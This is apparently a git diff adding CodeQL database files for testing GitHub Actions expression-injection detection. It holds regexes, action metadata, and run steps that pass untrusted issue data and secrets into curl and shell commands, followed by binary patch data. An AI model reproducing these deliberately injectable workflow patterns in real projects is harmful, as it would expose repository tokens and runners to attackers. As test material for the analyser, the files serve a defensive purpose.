github/workflows/workflow_run.ymlaction1/action.ymlaction1action2/action.ymlaction2action.yaml\bsteps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\binputs\.([A-Za-z0-9_-]+)\b\bneeds\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)toJSON\(inputs\.([A-Za-z0-9_-]+)\)fromJSON\(inputs\.([A-Za-z0-9_-]+)\)\bgithub\.event\.inputs\.([A-Za-z0-9_-]+)\btoJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)fromJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)\bjobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\bmatrix\.([A-Za-z0-9_-]+)\btoJSON\(matrix\.([A-Za-z0-9_-]+)\)fromJSON\(matrix\.([A-Za-z0-9_-]+)\)\benv\.([A-Za-z0-9_-]+)\btoJSON\(env\.([A-Za-z0-9_-]+)\)fromJSON\(env\.([A-Za-z0-9_-]+)\)Job: redirectIssueJob: changed_filesJob: echo-chamberJob: echo-chamber2Job: echo-chamber3Job: checkIssueInformationJob: issue_type_PredicterJob: cherry_pickJob: process-image-urlJob: job1Job: job2Job: create-matrixJob: analyzeJob: simple1Job outputs nodeUses StepRun StepRun Step: check-infoRun Step: extract-urlRun Step: curlRun Step: trim-urlRun Step: sinkRun Step: no-stepRun Step: flowRun Step: no-flowRun Step: step1Run Step: step2Uses Step: remove_quotationsUses Step: changed-filesUses Step: regex-matchUses Step: remove_quotesUses Step: sourceUses Step: stepUses Step: set-matrixUses Step: summaryUses Step: step0octo-org/this-repo/.github/workflows/workflow.ymltaintocto-org/summary-repo/.github/workflows/workflow.ymlakhileshns/heroku-deployinput.branchoutput.statusandroid-actions/setup-androidinput.cmdline-tools-versionoutput.ANDROID_COMMANDLINE_TOOLS_VERSIONapple-actions/import-codesign-certsinput.keychain-passwordoutput.keychain-passwordashley-taylor/read-json-property-actioninput.jsonoutput.valueashley-taylor/regex-property-actioninput.replacementinput.valueaszc/change-string-case-actioninput.stringoutput.capitalizedinput.replace-withoutput.uppercaseoutput.lowercaseaws-actions/configure-aws-credentialsinput.aws-access-key-idenv.AWS_ACCESS_KEY_IDsecret.AWS_ACCESS_KEY_IDinput.aws-secret-access-keyenv.AWS_SECRET_ACCESS_KEYsecret.AWS_SECRET_ACCESS_KEYinput.aws-session-tokenenv.AWS_SESSION_TOKENsecret.AWS_SESSION_TOKENbobheadxi/deploymentsinput.envoutput.envbufbuild/buf-breaking-actioninput.buf_tokenenv.BUF_TOKENbufbuild/buf-lint-actioncachix/cachix-actioninput.signingKeyenv.CACHIX_SIGNING_KEYcoursier/cache-actioninput.pathenv.COURSIER_CACHEcrazy-max/ghaction-import-gpginput.fingerprintoutput.fingerprintcsexton/release-asset-actioninput.release-urloutput.urldelaguardo/setup-clojureinput.bootenv.BOOT_VERSIONoutput.replacedgame-ci/unity-test-runnerinput.artifactsPathoutput.artifactsPathgetsentry/action-releaseinput.versionoutput.versioninput.version_prefixgithub/codeql-actioninput.outputoutput.sarif-outputgradle/gradle-build-actioninput.cache-encryption-keyenv.GRADLE_ENCRYPTION_KEYinput.build-scan-terms-of-service-agreeenv.BUILD_SCAN_TERMS_OF_SERVICE_AGREEinput.build-scan-terms-of-service-urlenv.BUILD_SCAN_TERMS_OF_SERVICE_URLhaya14busa/action-condinput.if_trueinput.if_falsehexlet/project-actioninput.mount-pathenv.PWDjsdaniell/create-jsoninput.nameoutput.successfullyinput.dirjwalton/gh-ecr-pushinput.imageoutput.imageUrllarsoner/circleci-artifacts-redirector-actioninput.artifact-pathinput.sourceinput.replacemattdavis0351/actionsinput.image-nameinput.tagmetro-digital/setup-tools-for-waasinput.gcp_sa_keyenv.GCLOUD_PROJECTmishakav/pytest-coverage-commentinput.multiple-filesoutput.summaryReportmymindstorm/setup-emsdkinput.actions-cache-folderenv.EMSDKruby/setup-rubyinput.ruby-versionoutput.ruby-prefixsalsify/action-detect-and-tag-new-versioninput.tag-templateoutput.tagshallwefootball/upload-s3-actioninput.destination_diroutput.object_keyshogo82148/actions-setup-perlinput.working-directoryenv.PERL5LIBsuisei-cn/actions-download-fileinput.filenameoutput.filenametimheuer/base64-to-fileinput.fileNameoutput.filePathinput.fileDirbranchcmdline-tools-versionkeychain-passwordjsonreplacementaws-access-key-idaws-secret-access-keyaws-session-tokenbuf_tokensigningKeyfingerprintrelease-urlbootartifactsPathversionversion_prefixoutputcache-encryption-keybuild-scan-terms-of-service-agreebuild-scan-terms-of-service-urlif_trueif_falsemount-pathdirartifact-pathimage-nametaggcp_sa_keymultiple-filesactions-cache-folderruby-versiontag-templatedestination_dirworking-directoryfilenamefileNamefileDir +echo "Bad Issue Title Format"exit 1echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENVcurl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labelsecho "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENVcurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/commentscurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }}curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labelscurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/commentsecho urldecode ${{env.issue_label}}curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g')curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/commentsecho "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENVecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENVecho "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENVgh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }}gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENVgit config user.name "${{env.user_name}}"git fetch --allgit checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}}git cherry-pick -x ${{github.event.after}} --strategy-option theirsgit push -u origin ${{env.auto_branch}}hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}"echo "::set-output name=initial_url::$BODY"echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUTecho "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT"Write-Output "::set-output name=MSG::$ENV{BODY}".*::set-output\s+name=(.*)::.*.*echo\s*"(.*)=.*\s*>>\s*(")?\$GITHUB_OUTPUT.*$BODY$MSG$INITIAL_URL$REDIRECTED_URL${BODY${MSG${INITIAL_URL${REDIRECTED_URL$ENV{BODY$ENV{MSG$ENV{INITIAL_URL$ENV{REDIRECTED_URLoutput.foooutput.all_changed_files_countjob_output]test]matrix]MSG]value]replaced]initial_url]redirected_url]trimmed_url][job_output][matrix][MSG][value][replaced][initial_url][redirected_url][trimmed_url] [job_output] [test] [matrix] [MSG] [value] [replaced] [initial_url] [redirected_url] [trimmed_url]Uses Step: remove_quotations [replaced]Run Step: extract-url [initial_url]Run Step: curl [redirected_url]Run Step: trim-url [trimmed_url]Job outputs node [job_output]Uses Step: step [value]Job outputs node [matrix]Uses Step: summary [value]Uses Step: step0 [value]Run Step: step1 [MSG]Run Step: step2 [test]semmle.labelPotential expression injection, which may be controlled by an external user. \ No newline at end of file diff --git a/db/db-yaml/default/yaml.rel b/db/db-yaml/default/yaml.rel new file mode 100644 index 0000000000000000000000000000000000000000..68a7a887f651d38ec0cd273155e841acc2d28904 GIT binary patch literal 33384 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 TopqiKb15e+`E{fHbItz;K!jeg literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/yaml.rel.checksum b/db/db-yaml/default/yaml.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..de6f34140970bfaacb1acf652a352d65a8f5675c GIT binary patch literal 12 ScmZQzU|?hb0{$OcwgLbJRswPW literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/yaml_locations.rel b/db/db-yaml/default/yaml_locations.rel new file mode 100644 index 0000000000000000000000000000000000000000..f46747ec341818ba278ef400b576bde6966ce296 GIT binary patch literal 11128 zcmWmDW7HkV0zlC(p4hf++qP}nwrv{|+qP{?Y}-!Wen0j)x4IhDxB&qH;R6B!dJ%z$ zL?SX#h)OgP6P*~uBoVQQO&k&umw3b{0ZB+oGJ2An6r`jFsYp#4(vpt!WFRA%$V?V; zl9g;^CkMI6O&+?FmqO$tKLsdAVOmgxq7y5`9`$KJLmJVTCN!lPE$K!pTGNKMw4*&8=tw6z(}k||;RJo@M}Gz|kUR5sYLEqZrM2CNPoXOky%qIL1__F`XIAWEQiT!(8SupQ9{b4GUSszbs}6 zOIgNhma~GDtYR&@SjT!cu#rt{W(!-{#&&kFlieI)4}00iehzSuLmcK*KtQ1Xe>0~! z!&%O8o(o(w|Nrmo5|_EcBd&6d|G3T#ZgPu<+~xsyxXV56^Oz?*b>6`GjOV=IC9inR 